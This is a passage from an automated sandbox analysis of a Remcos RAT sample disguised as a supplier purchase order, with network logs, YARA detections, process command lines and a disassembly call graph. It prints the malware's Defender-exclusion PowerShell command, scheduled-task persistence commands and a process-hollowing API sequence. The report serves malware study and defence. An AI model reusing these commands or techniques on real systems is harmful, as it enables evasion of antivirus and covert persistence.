                                  Oct 24, 2024 13:01:46.676846981 CEST240449708192.210.150.14192.168.2.5

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 24, 2024 12:58:13.567239046 CEST5285853192.168.2.51.1.1.1
                                  Oct 24, 2024 12:58:13.576842070 CEST53528581.1.1.1192.168.2.5

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Oct 24, 2024 12:58:13.567239046 CEST192.168.2.51.1.1.10x83f4Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Oct 24, 2024 12:58:13.576842070 CEST1.1.1.1192.168.2.50x83f4No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • geoplugin.net

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549710178.237.33.50805972C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 24, 2024 12:58:13.592226028 CEST71OUTGET /json.gp HTTP/1.1
                                  Host: geoplugin.net
                                  Cache-Control: no-cache
                                  Oct 24, 2024 12:58:14.440066099 CEST1165INHTTP/1.1 200 OK
                                  date: Thu, 24 Oct 2024 10:58:14 GMT
                                  server: Apache
                                  content-length: 957
                                  content-type: application/json; charset=utf-8
                                  cache-control: public, max-age=300
                                  access-control-allow-origin: *
                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                  Data Ascii: { "geoplugin_request":"173.254.250.71", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:06:58:05
                                  Start date:24/10/2024
                                  Path:C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe"
                                  Imagebase:0xfb0000
                                  File size:1'025'024 bytes
                                  MD5 hash:9FE3811C49214479C36A4F4A35E9CA08
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2168286100.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:06:58:11
                                  Start date:24/10/2024
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe"
                                  Imagebase:0x8b0000
                                  File size:433'152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:06:58:11
                                  Start date:24/10/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:5
                                  Start time:06:58:11
                                  Start date:24/10/2024
                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp"
                                  Imagebase:0xde0000
                                  File size:187'904 bytes
                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:6
                                  Start time:06:58:11
                                  Start date:24/10/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:7
                                  Start time:06:58:11
                                  Start date:24/10/2024
                                  Path:C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe"
                                  Imagebase:0x750000
                                  File size:1'025'024 bytes
                                  MD5 hash:9FE3811C49214479C36A4F4A35E9CA08
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:false

                                  General

                                  Target ID:8
                                  Start time:06:58:13
                                  Start date:24/10/2024
                                  Path:C:\Users\user\AppData\Roaming\keHuNxIumw.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Roaming\keHuNxIumw.exe
                                  Imagebase:0x5b0000
                                  File size:1'025'024 bytes
                                  MD5 hash:9FE3811C49214479C36A4F4A35E9CA08
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 74%, ReversingLabs
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:9
                                  Start time:06:58:13
                                  Start date:24/10/2024
                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                  Imagebase:0x7ff6ef0c0000
                                  File size:496'640 bytes
                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:10
                                  Start time:06:58:19
                                  Start date:24/10/2024
                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmpB43C.tmp"
                                  Imagebase:0xde0000
                                  File size:187'904 bytes
                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:11
                                  Start time:06:58:19
                                  Start date:24/10/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:12
                                  Start time:06:58:19
                                  Start date:24/10/2024
                                  Path:C:\Users\user\AppData\Roaming\keHuNxIumw.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\keHuNxIumw.exe"
                                  Imagebase:0xdc0000
                                  File size:1'025'024 bytes
                                  MD5 hash:9FE3811C49214479C36A4F4A35E9CA08
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2239762591.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  Reputation:low
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:12%
                                    Dynamic/Decrypted Code Coverage:91%
                                    Signature Coverage:3.2%
                                    Total number of Nodes:189
                                    Total number of Limit Nodes:18
                                    execution_graph 32140 19fd4e8 32141 19fd52e GetCurrentProcess 32140->32141 32143 19fd579 32141->32143 32144 19fd580 GetCurrentThread 32141->32144 32143->32144 32145 19fd5bd GetCurrentProcess 32144->32145 32146 19fd5b6 32144->32146 32149 19fd5f3 32145->32149 32146->32145 32147 19fd61b GetCurrentThreadId 32148 19fd64c 32147->32148 32149->32147 32150 19f4668 32151 19f467a 32150->32151 32152 19f4686 32151->32152 32154 19f4779 32151->32154 32155 19f479d 32154->32155 32159 19f4879 32155->32159 32163 19f4888 32155->32163 32161 19f48af 32159->32161 32160 19f498c 32160->32160 32161->32160 32167 19f44d4 32161->32167 32164 19f48af 32163->32164 32165 19f44d4 CreateActCtxA 32164->32165 32166 19f498c 32164->32166 32165->32166 32168 19f5918 CreateActCtxA 32167->32168 32170 19f59db 32168->32170 31960 945519c 31961 94551ae 31960->31961 31964 9457568 31961->31964 31962 9455120 31965 9457582 31964->31965 31977 94575a6 31965->31977 31984 9457c86 31965->31984 31989 9457fa7 31965->31989 31994 94580a7 31965->31994 31999 94581fb 31965->31999 32004 9457e7b 31965->32004 32012 9457ad9 31965->32012 32017 9457c1e 31965->32017 32022 9457eff 31965->32022 32027 9458150 31965->32027 32032 9457bd5 31965->32032 32037 94581aa 31965->32037 32042 9457ba9 31965->32042 32047 9457fac 31965->32047 32051 9457a0d 31965->32051 32057 9457b83 31965->32057 32065 9457d80 31965->32065 32070 9457880 31965->32070 31977->31962 32076 9458600 31984->32076 32081 9458610 31984->32081 31985 9457c01 31985->31984 31986 9458106 31985->31986 31986->31977 31990 9457acf 31989->31990 31991 9457ae1 31990->31991 32094 9454881 31990->32094 32098 9454888 31990->32098 31991->31977 31995 94580ad 31994->31995 32102 9454970 31995->32102 32106 9454978 31995->32106 31996 94580d0 32000 9457f16 31999->32000 32110 9454200 32000->32110 32114 9454208 32000->32114 32001 945824c 32005 9457e88 32004->32005 32006 9457ed6 32004->32006 32010 94546f0 Wow64SetThreadContext 32005->32010 32011 94546e8 Wow64SetThreadContext 32005->32011 32008 9454200 ResumeThread 32006->32008 32009 9454208 ResumeThread 32006->32009 32007 945824c 32008->32007 32009->32007 32010->32006 32011->32006 32013 9457acf 32012->32013 32014 9457ae1 32013->32014 32015 9454881 WriteProcessMemory 32013->32015 32016 9454888 WriteProcessMemory 32013->32016 32014->31977 32015->32013 32016->32013 32019 9457c2b 32017->32019 32018 9457afe 32018->31977 32019->32018 32020 9454881 WriteProcessMemory 32019->32020 32021 9454888 WriteProcessMemory 32019->32021 32020->32019 32021->32019 32023 9457f05 32022->32023 32025 9454200 ResumeThread 32023->32025 32026 9454208 ResumeThread 32023->32026 32024 945824c 32025->32024 32026->32024 32030 9454881 WriteProcessMemory 32027->32030 32031 9454888 WriteProcessMemory 32027->32031 32028 9457acf 32028->32027 32029 9457ae1 32028->32029 32029->31977 32030->32028 32031->32028 32033 9457bfb 32032->32033 32035 9454881 WriteProcessMemory 32033->32035 32036 9454888 WriteProcessMemory 32033->32036 32034 9457cec 32035->32034 32036->32034 32038 9457acf 32037->32038 32039 9457ae1 32037->32039 32038->32039 32040 9454881 WriteProcessMemory 32038->32040 32041 9454888 WriteProcessMemory 32038->32041 32039->31977 32040->32038 32041->32038 32043 9457acf 32042->32043 32044 9457ae1 32043->32044 32045 9454881 WriteProcessMemory 32043->32045 32046 9454888 WriteProcessMemory 32043->32046 32044->31977 32045->32043 32046->32043 32118 94547c1 32047->32118 32122 94547c8 32047->32122 32048 9457f1d 32048->32047 32053 945795f 32051->32053 32052 945794b 32052->31977 32053->32052 32126 9454b04 32053->32126 32130 9454b10 32053->32130 32058 9458154 32057->32058 32059 9457acf 32058->32059 32063 9454881 WriteProcessMemory 32058->32063 32064 9454888 WriteProcessMemory 32058->32064 32060 9457ae1 32059->32060 32061 9454881 WriteProcessMemory 32059->32061 32062 9454888 WriteProcessMemory 32059->32062 32060->31977 32061->32059 32062->32059 32063->32059 32064->32059 32066 9457d11 32065->32066 32066->32065 32067 9457afe 32066->32067 32068 9454881 WriteProcessMemory 32066->32068 32069 9454888 WriteProcessMemory 32066->32069 32067->31977 32068->32066 32069->32066 32071 94578b3 32070->32071 32072 945794b 32071->32072 32074 9454b04 CreateProcessA 32071->32074 32075 9454b10 CreateProcessA 32071->32075 32072->31977 32073 9457aa7 32074->32073 32075->32073 32077 9458625 32076->32077 32086 94546e8 32077->32086 32090 94546f0 32077->32090 32078 945863b 32078->31985 32082 9458625 32081->32082 32084 94546f0 Wow64SetThreadContext 32082->32084 32085 94546e8 Wow64SetThreadContext 32082->32085 32083 945863b 32083->31985 32084->32083 32085->32083 32087 9454735 Wow64SetThreadContext 32086->32087 32089 945477d 32087->32089 32089->32078 32091 9454735 Wow64SetThreadContext 32090->32091 32093 945477d 32091->32093 32093->32078 32095 94548d0 WriteProcessMemory 32094->32095 32097 9454927 32095->32097 32097->31990 32099 94548d0 WriteProcessMemory 32098->32099 32101 9454927 32099->32101 32101->31990 32103 9454977 ReadProcessMemory 32102->32103 32105 9454a07 32103->32105 32105->31996 32107 94549b7 ReadProcessMemory 32106->32107 32109 9454a07 32107->32109 32109->31996 32111 9454205 ResumeThread 32110->32111 32113 9454279 32111->32113 32113->32001 32115 9454248 ResumeThread 32114->32115 32117 9454279 32115->32117 32117->32001 32119 9454808 VirtualAllocEx 32118->32119 32121 9454845 32119->32121 32121->32048 32123 9454808 VirtualAllocEx 32122->32123 32125 9454845 32123->32125 32125->32048 32127 9454b99 CreateProcessA 32126->32127 32129 9454d5b 32127->32129 32131 9454b99 CreateProcessA 32130->32131 32133 9454d5b 32131->32133 32134 7bd47d0 32135 7bd4813 32134->32135 32136 7bd4862 32135->32136 32137 7bd4831 MonitorFromPoint 32135->32137 32137->32136 32171 9458b78 32172 9458d03 32171->32172 32174 9458b9e 32171->32174 32174->32172 32175 9458764 32174->32175 32176 9458df8 PostMessageW 32175->32176 32177 9458e64 32176->32177 32177->32174 32178 7bd0040 32180 7bd0061 32178->32180 32179 7bd0079 32180->32179 32184 7bd0be8 32180->32184 32188 7bd0be3 32180->32188 32181 7bd018c 32193 7bd0c1b 32184->32193 32197 7bd0c20 32184->32197 32185 7bd0c05 32185->32181 32189 7bd0be8 32188->32189 32191 7bd0c1b DrawTextExW 32189->32191 32192 7bd0c20 DrawTextExW 32189->32192 32190 7bd0c05 32190->32181 32191->32190 32192->32190 32194 7bd0c20 DrawTextExW 32193->32194 32196 7bd0cc6 32194->32196 32196->32185 32198 7bd0c6e DrawTextExW 32197->32198 32200 7bd0cc6 32198->32200 32200->32185 31952 19fad50 31953 19fad5f 31952->31953 31955 19fae38 31952->31955 31956 19fae7c 31955->31956 31957 19fae59 31955->31957 31956->31953 31957->31956 31958 19fb080 GetModuleHandleW 31957->31958 31959 19fb0ad 31958->31959 31959->31953 32138 19fd730 DuplicateHandle 32139 19fd7c6 32138->32139

                                    Executed Functions

                                    Function 07BD74A0 Relevance: 7.3, Strings: 5, Instructions: 1001COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 294 7bd74a0-7bd74c1 295 7bd74c8-7bd75b4 294->295 296 7bd74c3 294->296 298 7bd7dd9-7bd7e01 295->298 299 7bd75ba-7bd7705 call 7bd7408 295->299 296->295 302 7bd84d0-7bd84d9 298->302 345 7bd770b-7bd7766 299->345 346 7bd7da6-7bd7dd6 299->346 303 7bd7e0f-7bd7e18 302->303 304 7bd84df-7bd84f6 302->304 306 7bd7e1f-7bd7f0f call 7bd7408 303->306 307 7bd7e1a 303->307 327 7bd7f39 306->327 328 7bd7f11-7bd7f1d 306->328 307->306 332 7bd7f3f-7bd7f5f 327->332 330 7bd7f1f-7bd7f25 328->330 331 7bd7f27-7bd7f2d 328->331 333 7bd7f37 330->333 331->333 337 7bd7fbd-7bd8035 332->337 338 7bd7f61-7bd7fb8 332->338 333->332 357 7bd808a-7bd80cd call 7bd7408 337->357 358 7bd8037-7bd8088 337->358 350 7bd84cd 338->350 352 7bd7768 345->352 353 7bd776b-7bd7776 345->353 346->298 350->302 352->353 356 7bd7cba-7bd7cc0 353->356 359 7bd777b-7bd7799 356->359 360 7bd7cc6-7bd7d43 356->360 387 7bd80d8-7bd80de 357->387 358->387 362 7bd779b-7bd779f 359->362 363 7bd77f0-7bd7805 359->363 404 7bd7d90-7bd7d96 360->404 362->363 369 7bd77a1-7bd77ac 362->369 366 7bd780c-7bd7822 363->366 367 7bd7807 363->367 372 7bd7829-7bd7840 366->372 373 7bd7824 366->373 367->366 374 7bd77e2-7bd77e8 369->374 376 7bd7847-7bd785d 372->376 377 7bd7842 372->377 373->372 379 7bd77ae-7bd77b2 374->379 380 7bd77ea-7bd77eb 374->380 385 7bd785f 376->385 386 7bd7864-7bd786b 376->386 377->376 383 7bd77b8-7bd77d0 379->383 384 7bd77b4 379->384 381 7bd786e-7bd78df 380->381 392 7bd78f5-7bd7a6d 381->392 393 7bd78e1 381->393 389 7bd77d7-7bd77df 383->389 390 7bd77d2 383->390 384->383 385->386 386->381 391 7bd8133-7bd813f 387->391 389->374 390->389 394 7bd8141-7bd81c7 391->394 395 7bd80e0-7bd8102 391->395 401 7bd7a6f 392->401 402 7bd7a83-7bd7bbe 392->402 393->392 396 7bd78e3-7bd78ef 393->396 426 7bd8346-7bd834f 394->426 399 7bd8109-7bd8130 395->399 400 7bd8104 395->400 396->392 399->391 400->399 401->402 406 7bd7a71-7bd7a7d 401->406 416 7bd7bc0-7bd7bc4 402->416 417 7bd7c22-7bd7c37 402->417 407 7bd7d98-7bd7d9e 404->407 408 7bd7d45-7bd7d8d 404->408 406->402 407->346 408->404 416->417 420 7bd7bc6-7bd7bd5 416->420 418 7bd7c3e-7bd7c5f 417->418 419 7bd7c39 417->419 423 7bd7c66-7bd7c85 418->423 424 7bd7c61 418->424 419->418 425 7bd7c14-7bd7c1a 420->425 431 7bd7c8c-7bd7cac 423->431 432 7bd7c87 423->432 424->423 427 7bd7c1c-7bd7c1d 425->427 428 7bd7bd7-7bd7bdb 425->428 429 7bd81cc-7bd81e1 426->429 430 7bd8355-7bd83b0 426->430 433 7bd7cb7 427->433 434 7bd7bdd-7bd7be1 428->434 435 7bd7be5-7bd7c06 428->435 436 7bd81ea-7bd8334 429->436 437 7bd81e3 429->437 454 7bd83e7-7bd8411 430->454 455 7bd83b2-7bd83e5 430->455 438 7bd7cae 431->438 439 7bd7cb3 431->439 432->431 433->356 434->435 442 7bd7c0d-7bd7c11 435->442 443 7bd7c08 435->443 458 7bd8340 436->458 437->436 444 7bd8278-7bd82b6 437->444 445 7bd82bb-7bd82fb 437->445 446 7bd81f0-7bd822e 437->446 447 7bd8233-7bd8273 437->447 438->439 439->433 442->425 443->442 444->458 445->458 446->458 447->458 463 7bd841a-7bd84a3 454->463 455->463 458->426 468 7bd84a9 call 7bd8ee8 463->468 469 7bd84a9 call 7bd8ee3 463->469 467 7bd84af-7bd84c1 467->350 468->467 469->467
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'jq$TJoq$Tejq$pnq$xbmq
                                    • API String ID: 0-1217042899
                                    • Opcode ID: 5349278e4b698e069c1fa17d4b58fe3e2c08ab85636f26ddd542f221b7220dce
                                    • Instruction ID: 38eb268de26bfd62b12c7c29fb196b49c53f37c3507c0b28fc0d0096a3b6d4cb
                                    • Opcode Fuzzy Hash: 5349278e4b698e069c1fa17d4b58fe3e2c08ab85636f26ddd542f221b7220dce
                                    • Instruction Fuzzy Hash: B0B2C174E01228DFDB65CF69C984AD9BBB2FF89304F1581E9D409AB265DB319E81CF40
                                    Function 09459C50 Relevance: .4, Instructions: 405COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 578bab9b131828eb43c73945a3593133e8d488596a1dc39614e86282304d2ef2
                                    • Instruction ID: 178041cc7742c62fa8024e3bc199f80118d2e2cfef5ea0a23df2480382ba1634
                                    • Opcode Fuzzy Hash: 578bab9b131828eb43c73945a3593133e8d488596a1dc39614e86282304d2ef2
                                    • Instruction Fuzzy Hash: FEE1DD317006049FDB29DFA5C450BAEB7F6AF88700F64846EE94ADB395DB35E801CB61
                                    Function 07BDA380 Relevance: .3, Instructions: 298COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 070dd27ab0c2c22f7f86e326a656b309a95ba1939d402170c17a6e93be448ea3
                                    • Instruction ID: 82c829b5560c4366be6d43812c59e4cc70c38375b8bc069741782e992dab56e5
                                    • Opcode Fuzzy Hash: 070dd27ab0c2c22f7f86e326a656b309a95ba1939d402170c17a6e93be448ea3
                                    • Instruction Fuzzy Hash: E9D1E5B0D15228CFEB64CFA5C848BAEBBB2FF89300F1091A9D419A7244E7785D85CF51
                                    Function 07BDA370 Relevance: .3, Instructions: 298COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ce0760921bed267c13c822437a530b0e2c8a12eeab2056bf028d18e01512cb85
                                    • Instruction ID: f165e1ee26566e0e7493238314a34807f84f69cd030341472df7a253a5f3f387
                                    • Opcode Fuzzy Hash: ce0760921bed267c13c822437a530b0e2c8a12eeab2056bf028d18e01512cb85
                                    • Instruction Fuzzy Hash: 16D1F6B0D15218CFEB64CFA5C848BAEBBB2FF49300F1081A9D419A7244E7785D85CF51
                                    Function 09457880 Relevance: .2, Instructions: 172COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6d0aeab4e35119b0450bb2b50954f3da482af478aacc44f2b551615d528e46b5
                                    • Instruction ID: 95890faeeaa2e5a4ccf8fa714f338d3bdf82c88d4149c0fb40f72d47dfbfc6d5
                                    • Opcode Fuzzy Hash: 6d0aeab4e35119b0450bb2b50954f3da482af478aacc44f2b551615d528e46b5
                                    • Instruction Fuzzy Hash: 8D713A71D04228CFEB24CFA6C8407EABBB6BF89300F04D1EA940DA6251EB705A85CF50
